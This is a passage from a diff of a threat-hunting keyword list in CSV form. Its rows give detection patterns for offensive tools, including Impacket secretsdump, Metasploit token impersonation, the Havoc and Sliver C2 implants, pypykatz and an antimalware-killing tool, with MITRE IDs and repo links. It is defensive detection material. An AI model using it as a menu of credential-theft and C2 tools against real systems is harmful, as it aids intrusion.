menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" +"*impacketsecretsdump*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. 
SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" +"*impacket-secretsdump*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" "*impacket-secretsdump*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. 
SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference","1","1","N/A","10","10","N/A","N/A","N/A","N/A" -"*impacketserviceinstall*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11786","3291","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" -"*impacket-services*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. 
SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11786","3291","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" -"*impacketsmbclient*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11786","3291","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" -"*impacket-smbclient*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. 
SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11786","3291","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" -"*impacket-smbserver*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11786","3291","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" -"*impacket-ticketer*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. 
SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11786","3291","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" -"*impacketutils*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11786","3291","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" +"*impacketserviceinstall*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. 
SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" +"*impacket-services*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" +"*impacketsmbclient*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. 
SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" +"*impacket-smbclient*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" +"*impacket-smbserver*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. 
SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" +"*impacket-ticketer*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" +"*impacketutils*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. 
SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" "*impacket-wmiexec*","offensive_tool_keyword","AD exploitation cheat sheet","Command execution with WMI From Linux","T1550 - T1555 - T1212 - T1558","N/A","N/A","N/A","Exploitation tools","https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" -"*impacket-wmiexec*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself. Packets can be constructed from scratch. as well as parsed from raw data. and the object oriented API makes it simple to work with deep hierarchies of protocols. The library provides a set of tools as examples of what can be done within the context of this library","T1071.001 - T1071.002 - T1071.004 - T1071.005 ","TA0005 - TA0006","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","POST Exploitation tools","https://github.com/SecureAuthCorp/impacket","1","1","N/A","N/A","10","11786","3291","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" -"*ImpactDecoder*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. 
SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11786","3291","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" -"*ImpactPacket*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11786","3291","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" +"*impacket-wmiexec*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself. Packets can be constructed from scratch. as well as parsed from raw data. and the object oriented API makes it simple to work with deep hierarchies of protocols. 
The library provides a set of tools as examples of what can be done within the context of this library","T1071.001 - T1071.002 - T1071.004 - T1071.005 ","TA0005 - TA0006","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","POST Exploitation tools","https://github.com/SecureAuthCorp/impacket","1","1","N/A","N/A","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" +"*ImpactDecoder*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" +"*ImpactPacket*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. 
SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" "*impersonate_token *Administrator*","offensive_tool_keyword","metasploit","metasploit command lines patterns","T1573.002 - T1043 - T1021","TA0001 - TA0002 - TA0003","N/A","N/A","Exploitation Tools","N/A","1","0","Incognito","10","10","N/A","N/A","N/A","N/A" -"*impersonate_token *BUILTIN\Administrators*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","0","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" +"*impersonate_token *BUILTIN\Administrators*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. 
vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","0","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" "*ImpersonateAndUnload.cpp*","offensive_tool_keyword","unDefender","Killing your preferred antimalware by abusing native symbolic links and NT paths.","T1562.001 - T1055.001 - T1070.004","TA0040 - TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/APTortellini/unDefender","1","1","N/A","10","4","309","78","2022-01-29T12:35:31Z","2021-08-21T14:45:39Z" "*ImpersonateLocalService*","offensive_tool_keyword","cobaltstrike","A faithful transposition of the key features/functionality of @itm4n's PPLDump project as a BOF.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - 
T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/EspressoCake/PPLDump_BOF","1","1","N/A","10","10","131","24","2021-09-24T07:10:04Z","2021-09-24T07:05:59Z" "*ImpersonateLoggedOnUser*","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","10","10","334","84","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" 
@@ -11566,66 +11719,66 @@ "*imperva_gzip.py*","offensive_tool_keyword","Imperva_gzip_WAF_Bypass","Imperva Cloud WAF was vulnerable to a bypass that allows attackers to evade WAF rules when sending malicious HTTP POST payloads. such as log4j exploits. SQL injection. command execution. directory traversal. XXE. etc.","T1190 - T1210 - T1506 - T1061 - T1071 - T1100 - T1220","TA0001 - TA0002 - TA0003 - TA0040","N/A","N/A","Network Exploitation tools","https://github.com/BishopFox/Imperva_gzip_WAF_Bypass","1","1","N/A","N/A","2","146","29","2022-01-07T17:39:29Z","2022-01-07T17:38:33Z" "*Implant*TeamServer.exe*","offensive_tool_keyword","VirusTotalC2","Abusing VirusTotal API to host our C2 traffic. usefull for bypassing blocking firewall rules if VirusTotal is in the target white list and in case you don't have C2 infrastructure. now you have a free one","T1071.004 - T1102 - T1021.002","TA0011 - TA0008 - TA0042","N/A","N/A","C2","https://github.com/RATandC2/VirusTotalC2","1","1","N/A","10","10","5","81","2022-09-28T15:10:44Z","2022-09-28T15:12:42Z" "*Implant.ImplantGenerator*","offensive_tool_keyword","FudgeC2","FudgeC2 - a command and control framework designed for team collaboration and post-exploitation activities.","T1021.002 - T1105 - T1059.001 - T1059.003","TA0008 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/Ziconius/FudgeC2","1","0","N/A","10","10","237","54","2023-05-01T21:13:56Z","2018-09-09T21:05:21Z" -"*implant.sleep-obf*","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","10","10","4893","746","2023-10-03T23:32:31Z","2022-09-11T13:21:16Z" +"*implant.sleep-obf*","offensive_tool_keyword","havoc","Havoc is a modern and malleable 
post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","10","10","4898","745","2023-10-04T21:22:20Z","2022-09-11T13:21:16Z" "*implant/elevate/*","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/offsecginger/koadic","1","1","N/A","10","10","199","62","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z" "*implant/gather/*","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). 
with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/offsecginger/koadic","1","1","N/A","10","10","199","62","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z" "*implant/inject/*","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/offsecginger/koadic","1","1","N/A","10","10","199","62","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z" "*implant/persist/*","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). 
with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/offsecginger/koadic","1","1","N/A","10","10","199","62","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z" "*implant/pivot/*","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/offsecginger/koadic","1","1","N/A","10","10","199","62","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z" -"*implant/sliver/*","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003 - TA0006 - TA0009","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","1","N/A","10","10","6596","920","2023-10-03T20:36:09Z","2019-01-17T22:07:38Z" -"*Implant\SleepMask*","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - 
T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","10","10","4893","746","2023-10-03T23:32:31Z","2022-09-11T13:21:16Z" +"*implant/sliver/*","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003 - TA0006 - TA0009","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","1","N/A","10","10","6609","921","2023-10-04T21:02:15Z","2019-01-17T22:07:38Z" +"*Implant\SleepMask*","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","10","10","4898","745","2023-10-04T21:22:20Z","2022-09-11T13:21:16Z" "*implant-callback.*","offensive_tool_keyword","Nuages","A modular C2 framework","T1027 - T1055 - T1071 - T1105 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/p3nt4/Nuages","1","1","N/A","10","10","373","80","2023-10-02T23:24:19Z","2019-05-12T11:00:35Z" -"*ImplantSSP.csproj*","offensive_tool_keyword","ImplantSSP","Installs a user-supplied Security Support Provider (SSP) DLL on the system which will be loaded by LSA on system start","T1547.008 - T1073.001 - T1055.001","TA0003 - TA0005","N/A","N/A","Persistence - Defense Evasion","https://github.com/matterpreter/OffensiveCSharp/tree/master/ImplantSSP","1","1","N/A","10","10","1214","251","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z" +"*ImplantSSP.csproj*","offensive_tool_keyword","ImplantSSP","Installs a 
user-supplied Security Support Provider (SSP) DLL on the system which will be loaded by LSA on system start","T1547.008 - T1073.001 - T1055.001","TA0003 - TA0005","N/A","N/A","Persistence - Defense Evasion","https://github.com/matterpreter/OffensiveCSharp/tree/master/ImplantSSP","1","1","N/A","10","10","1214","252","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z" "*import _eternalhush*","offensive_tool_keyword","EternalHushFramework","EternalHush Framework is a new open source project that is an advanced C&C framework. Designed specifically for Windows operating systems","T1071.001 - T1132.001 - T1059.003 - T1547.001","TA0011 - TA0005 - TA0010 - TA0002","N/A","N/A","C2","https://github.com/APT64/EternalHushFramework","1","0","N/A","10","10","140","21","2023-09-21T19:04:41Z","2023-07-09T09:13:21Z" "*import apypykatz*","offensive_tool_keyword","pypykatz","Mimikatz implementation in pure Python","T1003.002 - T1055 - T1078","TA0003 - TA0002 - TA0004","N/A","N/A","Credential Access","https://github.com/skelsec/pypykatz","1","0","N/A","N/A","10","2471","369","2023-05-30T16:14:22Z","2018-05-25T22:21:20Z" -"*import 